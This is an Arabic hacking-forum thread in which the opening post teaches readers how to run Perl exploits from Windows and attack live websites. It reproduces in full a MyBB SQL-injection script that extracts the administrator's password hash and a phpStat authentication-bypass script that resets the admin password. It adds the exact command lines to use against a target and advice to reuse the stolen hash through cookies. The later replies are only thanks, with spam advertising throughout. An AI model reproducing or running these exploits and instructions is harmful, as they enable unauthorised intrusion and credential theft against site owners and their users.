|
| |||||||
| الهكرز و الاختراق حماية فيروسات اختراق كراك hacker crack virus الحماية من الهكرز والاختراق و الفايروسات وسرقة البريد |
 |  |  |
 |  | |
 |  |  |
 |
| | أدوات الموضوع | طريقة عرض الموضوع |
02-09-2006, 05:52 AM
| |||
| |||
| إكسبلويتات البيرل وكيفية تطبيقها على الويندوز وترجمة ثغراتها مع تطبيق عملي بسم الله الرحمن الرحيم موضعنا اليوم مهم جدا جدا جدا وهو كيفية استثمار الثغرات وترجمتها من لغة البيرل وتطبيقها علي الموقع ومن ثم اختراقة الحقيقه كنت من زمان ودي انزل شرحها لان اغلب المنتديات العربيه نزلتها وغير كذا اكثر الاكسبلويتات الان كلها بيرل ونزلت اكسبلويتات كثيره لثغرات سيق شرحها هنا بالمنتدى سووف اضع المهم منها والي تم تطبيقه بنجاح سووف اقوم بتطبيق لثغرتين مختلفه وباقي الاكسبلويتات سوف اضعها بالمرفقات ====== الحين نبدأ !! اول شيء الاداوات المستخدمة لترجمة ثغرات البيرل وهي برنامج اكتف بيرل وكيفية تطبيق الاكسبلويت المعمول بلغة البيرل برنامج activeperl وصلة تحميلة كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع وبعد التحميل قم بالتنصيب مثل تنصيب أي برنامج        الأن قم بإنشاء مجلد خاص فيك في الدرايفر c وسمه مثلا tryag الان نوقف هنا ونشووف لنا اكسبلويت طيب مثلا انا بطبق ثغرة MyBB Is Down وسبق طرحها بالمنتدى والكاتبDevil-00 طرح اكسبلويت بلغة البيرل لها نشووف الاكسبلويت كود: #!/usr/bin/perl -w
use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1] or !$ARGV[2]){
print "#################[ MyBB SQL-Injection ]############################\n";
print "# Coded By Devil-00 [ sTranger-killer ] #\n";
print "# Exmp:- mybb.pl www.victem.com mybb 0 0 || To Get Search ID #\n";
print "# Exmp:- mybb.pl www.victem.com mybb searchid 1 || To Get MD5 Hash #\n";
print "# Thnx For [ Xion - HACKERS PAL - ABDUCTER ] #\n";
print "################################################## #################\n";
exit;
}
my $host = 'http://'.$ARGV[0];
my $searchid = $ARGV[2];
if($ARGV[3] eq 0){
print "[*] Trying $host\n";
$url = "/".$ARGV[1]."/search.php?action=finduser&uid=-1' UNION SELECT uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,ui d,uid,uid,username,password FROM mybb_users where usergroup=4 and uid=1/*";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
$page =~ m/<a href="search\.php\?action=results&sid=(.*?)&sortby=&order=">/ && print "[+] Search ID To Use : $1\n";
exit;
}else{
print "[*] Trying $host\n";
$url = "/".$ARGV[1]."/search.php?action=results&sid=$searchid&sortby=&order=";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
$page =~ m/<a href="member\.php\?action=profile&\;uid=1">(.*?)<\/a>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="forumdisplay\.php\?fid=1">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
}
وضع الاكسبلويت في المجلد tryag الي سويناه بالدرايفرc انظر الصوره  طيب الحين كيف نعرف انها بلغة البيرل من التاالي /usr/bin/perlهذابيكون في اول الثغرة معاناها انها بلغة البيرل مشان المبتدئين يعرفوا احنا شغاليين كيف الحين نبدأ نذكر اهم الاسس لترجمة اي ثغرة اول شيء النظر للغة الثغرة اذا كانت بلغة السي او بلابيرل او البايثون او غيرة ثانيا النظر للمتغيرات او use مع التركيز فيها وتطبيقها بدقة واسم المتغيرات يختلف من اكسبلويت لاكسبلويت اخر وغالبا ماتكون تحت مسما Examples وراح نشووف الفرق بالاكسبلويت الثاني الي راح نطبقه الفرق كود: use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1] or !$ARGV[2]){
print "#################[ MyBB SQL-Injection ]############################\n";
print "# Coded By Devil-00 [ sTranger-killer ] #\n";
print "# Exmp:- mybb.pl www.victem.com mybb 0 0 || To Get Search ID #\n";
print "# Exmp:- mybb.pl www.victem.com mybb searchid 1 || To Get MD5 Hash #\n";
print "# Thnx For [ Xion - HACKERS PAL - ABDUCTER ] #\n";
print "################################################## #################\n";
exit;
كود: perl mybb.pl www.vetim.com mybb 0 0 بعد مانطبق الامر هذا وسوف ياتي لنا برقم البحث اليحتوي على بيانات الادمن .. وسوف نكتب الامر التالي لجلبها كود: perl mybb.pl www.vetim.com mybb searchid 1  طبعا الصووره واضحه طبقت فيها الامرين لو تلاحظون الامر الاول لما طبقته اعطاني ملعومات الادمن انه يحمل الرقم 5 وطبقت الامر الثاني لماحطيت الرقم الي حصلة عليه وطلع لي الباسوورد المشفر رووح اخدعه بالكوكيز  ============ الان نطبق ثغرة PHPStat Setup مثل ماقلنا اول ننظر للمتغيرات او use كود: #!/usr/bin/perl
################################################## ###################
#T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
################################################## ###################
# EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability
#
#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v )
#E-Mail : Alpha_Programmer@Yahoo.com
#
#This Xpl Change Admin's Pass in This Portal !!
#Discovered by: SoulBlack
#
#Vulnerable Version : phpStat 1.5
#
################################################## ###################
# Gr33tz To ==> mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com
#
# So Iranian Hacking & Security Teams :
#
# Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT
################################################## ###################
use IO::Socket;
if (@ARGV < 3)
{
print "\n==========================================\n";
print " \n -- Exploit By Alpha Programmer --\n\n";
print " Trap-Set UnderGrounD Hacking Team \n\n";
print " Usage: <T4rg3t> <DIR> <Password>\n\n";
print "==========================================\n\n";
print "Examples:\n\n";
print " phpStat.pl http://www.site.com/ /phpstat/ 12345\n";
exit();
}
my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
print "C0nn3cted\n";
$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n\n\n\n";
print "[+]Sending H3ll Packet ...\n";
print $remote $http;
sleep(1);
print "[+]Wait For Authentication Bypass ...\n";
sleep(100);
while (<$remote>)
{
}
print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n";
print "[+]User: admin\n";
print "[+]Pass: $ARGV[2]";
#
كود: use IO::Socket;
if (@ARGV < 3)
{
print "\n==========================================\n";
print " \n -- Exploit By Alpha Programmer --\n\n";
print " Trap-Set UnderGrounD Hacking Team \n\n";
print " Usage: <T4rg3t> <DIR> <Password>\n\n";
print "==========================================\n\n";
print "Examples:\n\n";
print " phpStat.pl http://www.site.com/ /phpstat/ 12345\n";
exit();
}
phpStat.pl كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع /phpstat/ 12345\n حيث ان phpStat.pl اسم الكسبلويت وتقدر تغيره لاي اسم مو شرط الي كتبته انا وكل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع الموقع المستهدف الحين رووح لدوس وطبق الاوامر واذا قالك OK ! Now Goto راح يعطي المسار رووح انسخ المسار وعلى فكره بيعطيك اليوزر والباس مو مشفر يعني اخترق وانت تضحك وهذا تطبيقي على موقع  واي سوال انا جاهز بالمرفقات راح تجدون اكسبلويتات مختلفه لبعض الثغرات الي نزل لها اكسبلويت بلغة البيرل عذابي غير=zmani اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احلا الاغاني اجمل الاناشيد اخر و افضل البومات  -   |
الان اخر العروض التجارية والتخفيضات على السفر والسياحة
والفنادق والهواتف المحمولة والازياء والموضه والسيارات وغيرها الكثير على موقع
لقطه
www.logta.com
لقطه دليلك التجاري
|
02-09-2006, 02:07 PM
| ||||
| ||||
|
يسلمووووووووووووووو على الشرح المميز اجو التثبيت
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احلا الاغاني اجمل الاناشيد اخر و افضل البومات - |
|
02-10-2006, 12:32 PM
| ||||
| ||||
|
مشكور على البرنامج والشرح المميز اخوكم\\وطواط اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احلا الاغاني اجمل الاناشيد اخر و افضل البومات - |
|
02-15-2006, 09:04 PM
| |||
| |||
|
العفووو يا اخوان شاكر لكم المرور زماني اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احلا الاغاني اجمل الاناشيد اخر و افضل البومات - |
|
09-01-2009, 03:56 AM
| ||||
| ||||
| رد: إكسبلويتات البيرل وكيفية تطبيقها على الويندوز وترجمة ثغراتها مع تطبيق عملي
مشكوووووووووووووووووووووووووووور
اغاني اسلامية اغاني جديدة اشرطة اناشيد جديدة احلا الاغاني اجمل الاناشيد اخر و افضل البومات - |
|
| أدوات الموضوع | |
| طريقة عرض الموضوع | |
| |
المواضيع المتشابهه | ||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر رد |
| مرجع وكل ما يتعلق بــWINDOWS XP | أسير الندم | الكمبيوتر و الانترنت الحاسب و الاجهزة computer hardware | 6 | 12-17-2007 08:36 AM |
العرض العادي
